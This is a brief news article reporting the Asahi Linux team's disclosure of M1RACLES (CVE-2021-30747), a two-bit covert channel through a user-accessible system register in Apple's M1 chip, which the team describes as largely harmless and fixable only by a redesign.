M1RACLES (CVE-2021-30747): covert channel vulnerability in the Apple Silicon chip

For Apple’s self-developed M1 processor, some developers have now discovered that it has a huge loophole, so serious that it cannot be repaired if Apple does not modify the design.

The Asahi Linux crew discovered that Apple’s self-developed M1 chip has a security vulnerability that allows any two applications running under the operating system to secretly exchange data. There are no need to use memory, slots, files, or any other normal operating system functions, which violates the operating system’s security principles.

The Asahi Linux crew refers to this vulnerability as M1RACLES (CVE-2021-30747). They said that the vulnerability is mainly harmless because it cannot be used to infect Mac computers, nor can it be used by vulnerabilities or malware to steal or tamper with data stored on the computer.

This vulnerability is summed up as, “A flaw in the design of the Apple Silicon “M1” chip allows any two applications running under an OS to covertly exchange data between them, without using memory, sockets, files, or any other normal operating system features. This works between processes running as different users and under different privilege levels, creating a covert channel for surreptitious data exchange…The ARM system register encoded as s3_5_c15_c10_1 is accessible from EL0, and contains two implemented bits that can be read or written (bits 0 and 1). This is a per-cluster register that can be simultaneously accessed by all cores in a cluster. This makes it a two-bit covert channel that any arbitrary process can use to exchange data with another cooperating process.

The Asahi Linux crew also said that the vulnerability was completely implanted in the Apple M1 chip. If the chip is not redesigned, the vulnerability cannot be fixed.